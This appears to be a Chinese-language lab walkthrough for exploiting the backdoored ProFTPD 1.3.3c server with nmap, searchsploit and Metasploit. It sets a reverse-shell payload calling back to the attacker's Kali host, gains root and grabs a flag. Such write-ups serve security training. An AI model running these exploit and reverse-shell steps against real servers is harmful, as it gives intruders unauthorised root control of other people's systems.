FTP服务后门利用
1.什么是 FTP?
是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。
FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114)
至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。
2.searchsploit 是什么?
顾名思义,它将搜索所有的漏洞和shellcode。它不会包含任何文件和谷歌黑客数据库的结果
earchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-DB二进制文件中找到。
操作
1.攻击机kali IP地址192.168.192.128 使用``nmap -sn -PE 192.168.192.1/24` 探测出靶机ip为192.168.192.129
2.详细探测靶机开放服务信息
nmap -sV 192.168.192.129
可以看到靶机开启了 21 ftp服务,版本号为 ProFTPD 1.3.3c 可以百度查找此版本存在的漏洞及利用方法
3.在kali上 使用 searchsploit 查看漏洞信息
翻译过来大概意思就是可执行后门受损源漏洞
searchsploit ProFTPD 1.3.3c #查找漏洞信息
4.第二个漏洞利用 集成到了 metasploit 中 ,可以利用 metasploit进行更简单的操作
打开 metasploit framwork: msfconsole
搜索可以使用的模块:
search ProFTPD 1.3.3c #查找该漏洞可利用模块
5.使用模块use exploit/unix/ftp/proftpd_133c_backdoor
选择第三个荷载 use cmd/unix/reverse
6.show options查看还有那些选项需要设置,如图设置好剩余options
set lhost 192.168.192.128 设置本机ip 就是攻击机IP地址
set rhosts 192.168.192.129 设置靶机ip
7.设置好所有参数之后运行 run 发现攻击成功 然后查看当前 id 发现是root用户 就不需要提权了
8.老样子执行命令优化终端
python -c "import pty; pty.spawn('/bin/bash')"
9.进入root命令 获取flag